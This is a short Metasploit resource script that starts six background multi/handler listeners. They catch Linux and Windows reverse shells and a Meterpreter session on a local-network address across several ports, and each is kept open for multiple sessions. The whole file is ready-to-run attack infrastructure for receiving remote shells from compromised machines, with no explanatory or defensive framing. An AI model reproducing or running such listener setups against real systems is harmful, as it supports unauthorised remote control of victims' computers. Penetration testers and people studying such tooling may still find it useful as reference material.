#USAGE: msfconsole -r thisscriptname.rc


use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.1.168
set LPORT 8888
set ExitOnSession false

exploit -j -z

use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 192.168.1.16
set LPORT 9999
set ExitOnSession false

exploit -j -z

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.16
set LPORT 8443
set ExitOnSession false

exploit -j -z

use exploit/multi/handler
set PAYLOAD windows/x64/shell/reverse_tcp
set LHOST 192.168.1.16
set LPORT 8088
set ExitOnSession false

exploit -j -z

use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 192.168.1.16
set LPORT 4444
set ExitOnSession false

exploit -j -z

use exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 192.168.1.16
set LPORT 5555
set ExitOnSession false

exploit -j -z

